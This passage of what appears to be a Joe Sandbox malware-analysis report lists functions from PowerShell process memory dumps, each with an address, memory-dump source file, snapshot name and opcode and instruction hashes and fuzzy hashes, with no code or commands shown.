                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4640000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4c2f122766b1197f94ed136fd0ca0ddb09998cf62317bddd49c443253a7e5605
                                            • Instruction ID: 9f7285105820187b579a5cd705711bbae59ead255d6a26cc37a4426cfab2bdbb
                                            • Opcode Fuzzy Hash: 4c2f122766b1197f94ed136fd0ca0ddb09998cf62317bddd49c443253a7e5605
                                            • Instruction Fuzzy Hash: 5A713C70E002099FDF18DFA5D484BADBBF2BF88305F14846AD411AB7A4DB30AD46CB91
                                            Function 0464B6F0 Relevance: .1, Instructions: 135COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348365721.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4640000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b234ea911278a0849083b6feb490a5bc5952141aef416feb139b60c15d3dd658
                                            • Instruction ID: 92bf60e9882e7cd87d95f7039dae656d175c4192987d14683084a3e7d5866ae9
                                            • Opcode Fuzzy Hash: b234ea911278a0849083b6feb490a5bc5952141aef416feb139b60c15d3dd658
                                            • Instruction Fuzzy Hash: D3416F71A002048FDB04DFB8C4947AEBBF7EFC9310F188469D845AB795DE349C419BA1
                                            Function 046477F9 Relevance: .1, Instructions: 131COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348365721.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4640000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e2a7260d91a8a8218c41527cd410dc80808f13cc4ea6e960202c578ea4b10aa9
                                            • Instruction ID: 0eb2f5803ee55096f9d65340358a6d7758fcc37e4cd23addbfc36378b23758ee
                                            • Opcode Fuzzy Hash: e2a7260d91a8a8218c41527cd410dc80808f13cc4ea6e960202c578ea4b10aa9
                                            • Instruction Fuzzy Hash: 79417C35B002448FDB15DF74D854AADBBB6EFC9352F184469E406EB7A0DB34AD81CBA0
                                            Function 074D96BD Relevance: .1, Instructions: 121COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e6c0aa1607842854b1b12638d6647180fd698537bada28571c7a1590f6bb7542
                                            • Instruction ID: 421bacb0e237222124505d5981ddec28eda6b9e7afa9987bcc66e426197dcc8c
                                            • Opcode Fuzzy Hash: e6c0aa1607842854b1b12638d6647180fd698537bada28571c7a1590f6bb7542
                                            • Instruction Fuzzy Hash: F541C5F1A20241DFCB208F58C5617AB7BA2EF82740F5884ABE884DB755D731EC45CBA1
                                            Function 0464F18C Relevance: .1, Instructions: 121COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348365721.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4640000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 46057d1bc66d4f8e531895b2b1fb29f5be9b53d801a9e6df13643631602198bb
                                            • Instruction ID: 51e3f5f2a751efe2aca0221c73628edeb5e04fc98130b96d19929a0f6c219d8a
                                            • Opcode Fuzzy Hash: 46057d1bc66d4f8e531895b2b1fb29f5be9b53d801a9e6df13643631602198bb
                                            • Instruction Fuzzy Hash: 4C51E074A002098FDB08DFA8D484ADE7BB2FF98310F149558D905AB7A5DB70EC85DFA1
                                            Function 092A111A Relevance: .1, Instructions: 121COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3360877380.00000000092A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_92a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d955435520d19b9053dca414d6e8626c4376dd4c0ef8eb28d1891292ececd43c
                                            • Instruction ID: d9f46ebdda67426aa04222277c694c413e6b9df07d53db72aec1b8a03a55187c
                                            • Opcode Fuzzy Hash: d955435520d19b9053dca414d6e8626c4376dd4c0ef8eb28d1891292ececd43c
                                            • Instruction Fuzzy Hash: 64410A35A152199FCB14CF98D580ADDBBB1FF88364F148155E818EB352C731ED91CB90
                                            Function 074D0AF0 Relevance: .1, Instructions: 120COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8c5781b4a1696d061cd3b61dc74c985fee636ef88d7cbff3be3575905547ac8f
                                            • Instruction ID: 9593b073a2bc511b76ea468d43ac250cf4fc4380f1ec7525a18ecba3225f1138
                                            • Opcode Fuzzy Hash: 8c5781b4a1696d061cd3b61dc74c985fee636ef88d7cbff3be3575905547ac8f
                                            • Instruction Fuzzy Hash: E03123B27002158BCB549AB988603FFB7A5EF84218F20883FD945DB391DB32DD41CB90
                                            Function 04647A53 Relevance: .1, Instructions: 120COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348365721.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4640000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 71d988b40363ef0c24eee8ee357704fbb3e754e48107ef9a747a5e6bac509a67
                                            • Instruction ID: e1f323ed53f2c0286ab30876776595fccae5a59a6889b20af85bcadbe9bc5210
                                            • Opcode Fuzzy Hash: 71d988b40363ef0c24eee8ee357704fbb3e754e48107ef9a747a5e6bac509a67
                                            • Instruction Fuzzy Hash: 92414C70A002089FDB18DFA9C4847EDBBF2FF89351F148969D005AB7A0DB70AD45CB91
                                            Function 0464B700 Relevance: .1, Instructions: 119COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348365721.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4640000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ef55405f7d509f27607b58bd04c44965dd89067d61fc47ab6c5621e4c82092d3
                                            • Instruction ID: a2634c0e91372e1f4e83370ba854d44cb397aec9b3f9a306cfc9f09d94d671b0
                                            • Opcode Fuzzy Hash: ef55405f7d509f27607b58bd04c44965dd89067d61fc47ab6c5621e4c82092d3
                                            • Instruction Fuzzy Hash: FE412E70A002048FDB44DFB9C494BAEBAF7EFC9310F14C469D905AB795DE359C419BA1
                                            Function 092A0FB8 Relevance: .1, Instructions: 119COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3360877380.00000000092A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_92a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0eafbcb680e14c2ad4d57545339934fd8754d3504feab60e3b4194dccc54a172
                                            • Instruction ID: 3b27affe6f679cb1dc7f7b577b35c17d945ccaa08ad29a161e0d0440bff14faa
                                            • Opcode Fuzzy Hash: 0eafbcb680e14c2ad4d57545339934fd8754d3504feab60e3b4194dccc54a172
                                            • Instruction Fuzzy Hash: BD411A75A151098FCB05CF98C984AAEB7B5FF88320F248558E915EB3A5C736EC51CF90
                                            Function 092A0FC8 Relevance: .1, Instructions: 116COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3360877380.00000000092A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_92a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d4ae9b5432adf85bbbc370b86d6d289a9c2beafb8241181456da5da93bd09c7f
                                            • Instruction ID: 70f45425879e0e60fcef876e8042b9894f0215c7004dc55e091bc207d5b425c0
                                            • Opcode Fuzzy Hash: d4ae9b5432adf85bbbc370b86d6d289a9c2beafb8241181456da5da93bd09c7f
                                            • Instruction Fuzzy Hash: CC411875A151098FCB05CF9CC9849AEBBB1FF88320F248658E915EB3A5C735EC51CB90
                                            Function 092A0039 Relevance: .1, Instructions: 112COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3360877380.00000000092A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_92a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 446a3606604696791b32f68d9153388bd723de5aa53651778993ce2e8e09212a
                                            • Instruction ID: 880d751a41a20a3231b4b072af354fabbf8b36ecc47b51635a3864a882ead19d
                                            • Opcode Fuzzy Hash: 446a3606604696791b32f68d9153388bd723de5aa53651778993ce2e8e09212a
                                            • Instruction Fuzzy Hash: 20411675A111099FCB04CF9CC9849EEB7B6FF89320B248659E914EB3A4D331EC41CB94
                                            Function 04642BB8 Relevance: .1, Instructions: 111COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348365721.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4640000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9e5bd1f88448a67ee27eaace582630fed25f265148c9c49dfb5048d82a5cff6c
                                            • Instruction ID: 226c97eb77c0ac1fcb8ec666c34ab93cf76a80fe4675e84c5c40f82a3dc426d3
                                            • Opcode Fuzzy Hash: 9e5bd1f88448a67ee27eaace582630fed25f265148c9c49dfb5048d82a5cff6c
                                            • Instruction Fuzzy Hash: 714138B4A002059FCB05CF59C4A4AEEFBB1FF88314B2585AAE505AB364D731FC51CBA4
                                            Function 074D48F0 Relevance: .1, Instructions: 102COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ffb450a009581c4b0a99f5ce8376a69522a015984662a04c825bc81d1633f7d0
                                            • Instruction ID: d65cec72eb31903b88fd35b5a5e264b2e187b9d9f5dda9935db971398391c4a9
                                            • Opcode Fuzzy Hash: ffb450a009581c4b0a99f5ce8376a69522a015984662a04c825bc81d1633f7d0
                                            • Instruction Fuzzy Hash: F731B0B0B10104ABD744ABA8C855BAF7BA3AFC5310F50C425E901AFBC1CF75AC468BE5
                                            Function 074D0FD0 Relevance: .1, Instructions: 94COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bbc60cedbb8b19b91eb55bbf4a47f36e436f22405bffb9c5dbc4a211e79b2048
                                            • Instruction ID: 5795fa73dedd64477a2b1b8ba365c2ec254e9bb30b936e93dc7efd5008b3d55c
                                            • Opcode Fuzzy Hash: bbc60cedbb8b19b91eb55bbf4a47f36e436f22405bffb9c5dbc4a211e79b2048
                                            • Instruction Fuzzy Hash: 142161B170035697DB2469B988607BB76869BC5705F34C42F9945DB7C1CD75CC4183A1
                                            Function 074D0FB5 Relevance: .1, Instructions: 84COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e93182beca4fb14f5abcb0442733054f36b632f6b67fa779aa38a20daba1037c
                                            • Instruction ID: 79b523b2ba96b954853886aff71255c66d853f91eada7781c4bacf5621498492
                                            • Opcode Fuzzy Hash: e93182beca4fb14f5abcb0442733054f36b632f6b67fa779aa38a20daba1037c
                                            • Instruction Fuzzy Hash: AE217FB1304395ABC7221AB588207B77FA59F87304F24845BE980DB7C2C979CD44C372
                                            Function 074D6151 Relevance: .1, Instructions: 83COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ab946594fb4b79331bcc1bde7d9154d08cc2f5f12f148184ec238c689bf585c6
                                            • Instruction ID: 8bf112ae20e8f60713112051e59c3011f77237d5833fba47ce76709eb8ce0ee9
                                            • Opcode Fuzzy Hash: ab946594fb4b79331bcc1bde7d9154d08cc2f5f12f148184ec238c689bf585c6
                                            • Instruction Fuzzy Hash: 0A2126F16183029FD7109F2488217EA7B719F82290F0945ABD884CB282E735D944CBE3
                                            Function 02D0F348 Relevance: .1, Instructions: 76COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348028471.0000000002D0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D0D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2d0d000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b31e3f66fe1ecd0808d4e468854c385651430244f69701ba453d99f19337a4cb
                                            • Instruction ID: f58a155723e493a21dfb25f95c49ecdebf07b617690dce791786aaceeda09436
                                            • Opcode Fuzzy Hash: b31e3f66fe1ecd0808d4e468854c385651430244f69701ba453d99f19337a4cb
                                            • Instruction Fuzzy Hash: 752102B1504200DFDF25CF54D9C0B26BB65FB88324F34C5ADE9494A7A6CB3AD816CB61
                                            Function 074D49CD Relevance: .1, Instructions: 74COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7d2c72f9289db2b20f061cb8fcaeae8dd107c130cfe34b8d918a46e0b7dc796c
                                            • Instruction ID: 225add022d1b9de08192a8860b4657da4ca973783fbf4a477c7c0e83c3b51e80
                                            • Opcode Fuzzy Hash: 7d2c72f9289db2b20f061cb8fcaeae8dd107c130cfe34b8d918a46e0b7dc796c
                                            • Instruction Fuzzy Hash: 1521DEB1A50104DFC7049BA8C465FAEBBA2AF85314F10C416E901AFB81CB75EC46CBE5
                                            Function 0464FB82 Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348365721.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4640000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 638bc8018883612007335a6b3aed63ca7467d43dd3bacb22e7884b591174375c
                                            • Instruction ID: 891aaa4fd04e3a1297c9ca260cc76a2bc49e7d0a8906aa066a7829955309cf0f
                                            • Opcode Fuzzy Hash: 638bc8018883612007335a6b3aed63ca7467d43dd3bacb22e7884b591174375c
                                            • Instruction Fuzzy Hash: F6215E74E112099FCF48DFA8E4909EEBBB2FF88300F105569E506AB365DA305946CB81
                                            Function 0464FCEA Relevance: .1, Instructions: 67COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348365721.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4640000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: db07512ce2215f31c538e168da91f64ec271cc30c94ae6b93363ee8e6b2e23eb
                                            • Instruction ID: e33263f74074ae53642a9d275a188da0209b6436e769725c5eb29bd8ce9cbcc9
                                            • Opcode Fuzzy Hash: db07512ce2215f31c538e168da91f64ec271cc30c94ae6b93363ee8e6b2e23eb
                                            • Instruction Fuzzy Hash: 1911E6397042805FC70A5B79E0487EE7FA2DFC6325F1441AED4068B392DE75194ACB92
                                            Function 04649597 Relevance: .1, Instructions: 58COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348365721.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4640000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 42ec14f44f013fe0b6d52573f8c7863544ce2da85cb2e5c04114f1c8447527ca
                                            • Instruction ID: 4e98893766bf1af4b3a4c3c4db7c9cdde328bc5e68047dab791d4b122f87a124
                                            • Opcode Fuzzy Hash: 42ec14f44f013fe0b6d52573f8c7863544ce2da85cb2e5c04114f1c8447527ca
                                            • Instruction Fuzzy Hash: A0215EB4A042099FCB00CFA8C5809AEFBF5FF89310B148199D908AB352C731FD45CBA0
                                            Function 02D0F343 Relevance: .1, Instructions: 57COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348028471.0000000002D0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D0D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2d0d000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bf7c6e54c1a5606df9920c627ceee2d02bff4a31f99f9d7d2463bdde2845d744
                                            • Instruction ID: a6035b66298c42aa998dd037b3c0c4d09ec7ed33e617b664599894a18078f3c5
                                            • Opcode Fuzzy Hash: bf7c6e54c1a5606df9920c627ceee2d02bff4a31f99f9d7d2463bdde2845d744
                                            • Instruction Fuzzy Hash: 0921CD76504240DFCF16CF50D9C0B16BF72FB88314F28C5A9DD094A6A6C33AD86ACB91
                                            Function 0464FCA0 Relevance: .1, Instructions: 51COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348365721.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4640000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8b54db16b3134824599e189df16fc904a74a35581106e5ac664f8b452ebfc123
                                            • Instruction ID: c35603f7387faedd59743c2f1ad5ab267d2c652f5bd0aa73e1c92a046431a28c
                                            • Opcode Fuzzy Hash: 8b54db16b3134824599e189df16fc904a74a35581106e5ac664f8b452ebfc123
                                            • Instruction Fuzzy Hash: 340124353082444FCB0A5B78A4482AEBF62EFC5320F04017ED005CB382DE654E0987A1
                                            Function 02D0D01D Relevance: .0, Instructions: 45COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348028471.0000000002D0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D0D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2d0d000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0f1f4c75d66ba2d5fcdade86eb12a84b36fabc1d1eb63d05c34bf30dab33a78d
                                            • Instruction ID: 3cce6c67092095602d0548c08bb782bdd36fe6de9be37759df8487fcc868c66c
                                            • Opcode Fuzzy Hash: 0f1f4c75d66ba2d5fcdade86eb12a84b36fabc1d1eb63d05c34bf30dab33a78d
                                            • Instruction Fuzzy Hash: 8A01DFB14093009AE7208AA9C9C0F66BF98DF41324F28C41BED8C4B3A2C7789C45C6B1
                                            Function 02D0D005 Relevance: .0, Instructions: 45COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348028471.0000000002D0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D0D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2d0d000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: da395e7588664677d0e95b5aef0c61b39b58b14babd352781d65e22445d8e82d
                                            • Instruction ID: 43565b1e279b0e76d7d7909cbec0114cc0f86d20295391eed2d8d4be9f2761de
                                            • Opcode Fuzzy Hash: da395e7588664677d0e95b5aef0c61b39b58b14babd352781d65e22445d8e82d
                                            • Instruction Fuzzy Hash: 6C014C6240E3C09ED7128B258994B52BFB8DF53224F1DC0DBE9888F2E3C2695849C772
                                            Function 0464D590 Relevance: .0, Instructions: 43COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348365721.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4640000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: af5c717010153c04b43706859be5afedccb416ae9d58ecc9ba54aea41954bd4e
                                            • Instruction ID: 8d2e2460859e45baf848f76f555b5b1e79d45670250819554a7095b67d11bc7b
                                            • Opcode Fuzzy Hash: af5c717010153c04b43706859be5afedccb416ae9d58ecc9ba54aea41954bd4e
                                            • Instruction Fuzzy Hash: 4F016D343419508F8B866B28A46847D7FF7EFD9251325449EE407C7392CE648C068B95
                                            Function 0464F350 Relevance: .0, Instructions: 38COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348365721.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4640000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9d96e5384ba00d08364244cf0d6759ea4c17566fc2cda796089a9c316ed110ce
                                            • Instruction ID: 8c7ec93998e1f45d5a28cb0417e6f2e3f754c68418aa89c837c2238968282a23
                                            • Opcode Fuzzy Hash: 9d96e5384ba00d08364244cf0d6759ea4c17566fc2cda796089a9c316ed110ce
                                            • Instruction Fuzzy Hash: C9F0F6317002004BDF186A6E949466E77E7FBC9351F00853DD10E87390EF31AC0657A2
                                            Function 0464D5A0 Relevance: .0, Instructions: 37COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348365721.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4640000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 566974c6a75431c3e946ff1c296e7fe9520c18df861aa3a7a24cfa0bcbfe2331
                                            • Instruction ID: 0f2e15330379de1ba5b5a97903cc205d75adc834bd458fe01de97eb1ce21fae8
                                            • Opcode Fuzzy Hash: 566974c6a75431c3e946ff1c296e7fe9520c18df861aa3a7a24cfa0bcbfe2331
                                            • Instruction Fuzzy Hash: D1F06D353409104F8B896B28A16847E3BE7EFD8651324405EE906C3381CE249C028B91
                                            Function 0464FE80 Relevance: .0, Instructions: 34COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348365721.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4640000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e03e4dc5e1dae9300f02f92efb3adb8b5819b86a49509934ce9289812731bd16
                                            • Instruction ID: 337be35cd209bb4b90406924d7a2a09a6905ea0389581e142826ea411e09c8fd
                                            • Opcode Fuzzy Hash: e03e4dc5e1dae9300f02f92efb3adb8b5819b86a49509934ce9289812731bd16
                                            • Instruction Fuzzy Hash: 6EF062746052408FDB49CF28D481954BBF1EFC9218718C4EAD4098F727E631EC43DBA0
                                            Function 0464F341 Relevance: .0, Instructions: 33COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348365721.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4640000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0f3714855a5b097fbf6bba076ce4afd5ab4ffc6fbe9d35c1968351aa92506087
                                            • Instruction ID: ea24d2b242977ece831dfa119fa6996749c725b1a4cfc30e94fafe580cc12fa7
                                            • Opcode Fuzzy Hash: 0f3714855a5b097fbf6bba076ce4afd5ab4ffc6fbe9d35c1968351aa92506087
                                            • Instruction Fuzzy Hash: D6F0E2363092404BCB1A526D60945AE7FB6EBC6311714857ED04ECB393CE62480997A2
                                            Function 092A1AA2 Relevance: .0, Instructions: 31COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3360877380.00000000092A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_92a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3f717e14a36acaef80912e8c6928f7c4a0d62f6c2d2af4d10b15cd9492a02b1b
                                            • Instruction ID: d21e583a30525bfbd892cf37aebe1c1e31a31b217fdedcf71a3bc1ece05ab3d2
                                            • Opcode Fuzzy Hash: 3f717e14a36acaef80912e8c6928f7c4a0d62f6c2d2af4d10b15cd9492a02b1b
                                            • Instruction Fuzzy Hash: 64F01D36A00509AFCB05DFC8D9808EDFB76FF88320B248119E615A32A1C732AD62DB50
                                            Function 092A0AFC Relevance: .0, Instructions: 30COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3360877380.00000000092A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_92a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 75214f1c5612bb4b9a53f11ede49be29b59186c9befc7b9cd3ee95855008a162
                                            • Instruction ID: c5c6471e18f01bc3c7f1dc0657e113d0e746d45e95d83d952b0e40c1635efa35
                                            • Opcode Fuzzy Hash: 75214f1c5612bb4b9a53f11ede49be29b59186c9befc7b9cd3ee95855008a162
                                            • Instruction Fuzzy Hash: BAF0BD75A00119AFCB15DFDCD9808ADFB76FF88324B248559EA14A72A0C732AC51DB50
                                            Function 0464FCF8 Relevance: .0, Instructions: 24COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348365721.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4640000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f470ac3eb6b7cfc7b0ca7febc1f7820d66f0be241de78615f8259886233ce2c1
                                            • Instruction ID: 339f388b73bfeea673615cc8304a3df8e631e74afbc4d1213b0d6cfa8684e00f
